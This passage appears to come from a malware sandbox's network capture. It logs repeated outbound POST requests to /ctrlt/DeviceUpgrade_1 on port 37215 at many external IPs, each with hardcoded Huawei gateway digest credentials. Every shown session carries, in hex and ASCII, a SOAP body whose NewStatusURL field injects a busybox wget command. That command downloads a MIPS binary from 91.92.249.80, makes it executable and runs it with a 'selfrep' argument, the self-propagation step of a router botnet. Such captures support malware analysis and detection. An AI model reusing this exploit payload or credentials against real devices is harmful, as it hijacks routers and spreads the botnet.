                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          573192.168.2.2341186198.0.131.11337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197344065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          574192.168.2.234993841.107.222.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197352886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          575192.168.2.235145041.223.168.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197765112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          576192.168.2.2354788197.56.135.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197765112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          577192.168.2.233415041.108.115.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197796106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          578192.168.2.2345176197.25.158.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197953939 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          579192.168.2.2351228197.204.180.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197994947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          580192.168.2.2359684157.230.51.17937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.197995901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          581192.168.2.2338356157.93.102.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.198029995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          582192.168.2.2340546157.234.57.037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.198257923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
